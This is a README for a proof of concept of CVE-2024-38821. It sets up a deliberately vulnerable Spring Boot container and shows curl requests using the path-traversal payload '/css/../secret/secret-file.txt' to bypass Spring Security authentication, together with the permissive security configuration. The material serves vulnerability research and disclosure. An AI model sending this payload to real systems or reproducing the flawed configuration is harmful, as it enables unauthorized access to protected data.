# CVE-2024-38821: Proof of Concept (PoC): Authentication Bypass in Spring Framework

This is a proof of concept for the [CVE-2024-38821](https://spring.io/security/cve-2024-38821) vulnerability

## Execution Steps
1. Build the Docker image (Spring Boot 3.3.4, based on Spring Framework 6.1.13)
   ```
   cd vuln
   docker build -t cve-2024-38821-poc .
   ```
2. Run the container and expose port 8080 to the host machine
   ```
   docker run -d -p 8080:8080 --name cve-2024-38821-poc cve-2024-38821-poc
   ```
3. Run the following command to execute the PoC and confirm the vulnerability
   ```
   curl -v --path-as-is "http://localhost:8080/secret/secret-file.txt" # Expected: 302 response (login required)
   curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt" # Expected: 200 response (bypassed authentication)
   ```

   If the attack is successful, the response will display: `This is a secret file.`

## Explanation
1. Create `SecurityConfig.java` to configure access permissions:
    - Allow unauthenticated access to paths under /css/.
    - Require authentication for paths under /secret/.
    
    ```java
    public SecurityWebFilterChain securityWebFilterChain(ServerHttpSecurity http) {
        return http
            .authorizeExchange(exchange -> exchange
                .pathMatchers("/css/**", "/").permitAll() // Static resources and the top page do not require authentication
                .pathMatchers("/secret/**").authenticated() // Authentication is required for the "secret" path
                .anyExchange().authenticated() // Authentication is required for all other paths
            )
            .formLogin().and() // Enable form-based authentication
            .build();
    }
    ```
3. Create the following payload. Since the payload starts with /css/, it matches the allowed path pattern. It does not start with /secret/, so it does not match the authentication-required path pattern:
   - Path: `/css/../secret/secret-file.txt`

4. Use the following `curl` command to execute the PoC and verify if the attack is successful:
    ```
    # Note: The --path-as-is option is required to send the request without URL normalization.
    curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt"
    ```
   If the attack is successful, the response will display: `This is a secret file.`

## Disclaimer
This PoC is provided for educational and security research purposes. Before using this in a real system, ensure the vulnerability has been fixed and you have proper authorization. The author takes no responsibility for any misuse of this code.
